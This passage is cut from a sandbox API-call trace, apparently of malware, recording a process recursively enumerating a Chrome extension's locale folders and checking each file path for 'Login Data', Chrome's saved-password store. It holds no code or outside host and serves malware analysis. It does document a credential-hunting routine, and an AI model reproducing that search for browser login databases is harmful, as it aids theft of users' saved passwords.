HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi" [0161.704] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\" [0161.704] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\") returned 138 [0161.704] lstrlenW (lpString="messages.json") returned 13 [0161.704] GetProcessHeap () returned 0x8e0000 [0161.704] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\" [0161.704] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" [0161.704] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.704] GetProcessHeap () returned 0x8e0000 [0161.704] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.704] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.704] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.704] GetProcessHeap () returned 0x8e0000 [0161.704] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.704] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x117, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.704] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.704] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.704] GetProcessHeap () returned 0x8e0000 [0161.704] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.704] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.704] GetProcessHeap () returned 0x8e0000 [0161.704] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.704] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="hu", cAlternateFileName="")) returned 1 [0161.705] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0161.705] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0161.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.705] lstrlenW (lpString="\\") returned 1 [0161.705] GetProcessHeap () returned 0x8e0000 [0161.705] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.705] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.705] lstrlenW (lpString="hu") returned 2 [0161.705] GetProcessHeap () returned 0x8e0000 [0161.705] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.705] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" [0161.705] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.705] GetProcessHeap () returned 0x8e0000 [0161.705] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned 137 [0161.705] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned 137 [0161.705] lstrlenW (lpString="\\*.*") returned 4 [0161.705] GetProcessHeap () returned 0x8e0000 [0161.705] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" [0161.705] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*.*" [0161.705] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.706] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.706] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.706] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.706] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.706] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.706] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned 137 [0161.706] lstrlenW (lpString="\\") returned 1 [0161.706] GetProcessHeap () returned 0x8e0000 [0161.706] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.706] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu" [0161.706] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\" [0161.706] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\") returned 138 [0161.706] lstrlenW (lpString="messages.json") returned 13 [0161.706] GetProcessHeap () returned 0x8e0000 [0161.706] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.706] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\" [0161.706] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" [0161.706] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.706] GetProcessHeap () returned 0x8e0000 [0161.706] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.707] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json", lpSrch="Login Data") returned 0x0 [0161.707] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.707] GetProcessHeap () returned 0x8e0000 [0161.707] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.707] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.707] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.707] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.707] GetProcessHeap () returned 0x8e0000 [0161.707] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.707] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.707] GetProcessHeap () returned 0x8e0000 [0161.707] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.707] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="id", cAlternateFileName="")) returned 1 [0161.707] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0161.707] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0161.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.707] lstrlenW (lpString="\\") returned 1 [0161.707] GetProcessHeap () returned 0x8e0000 [0161.707] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.707] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.707] lstrlenW (lpString="id") returned 2 [0161.707] GetProcessHeap () returned 0x8e0000 [0161.707] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.707] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.707] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" [0161.707] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.707] GetProcessHeap () returned 0x8e0000 [0161.707] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.707] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned 137 [0161.708] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned 137 [0161.708] lstrlenW (lpString="\\*.*") returned 4 [0161.708] GetProcessHeap () returned 0x8e0000 [0161.708] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.708] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id" [0161.708] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*.*" [0161.708] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86585990, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.708] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.708] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86585990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86585990, 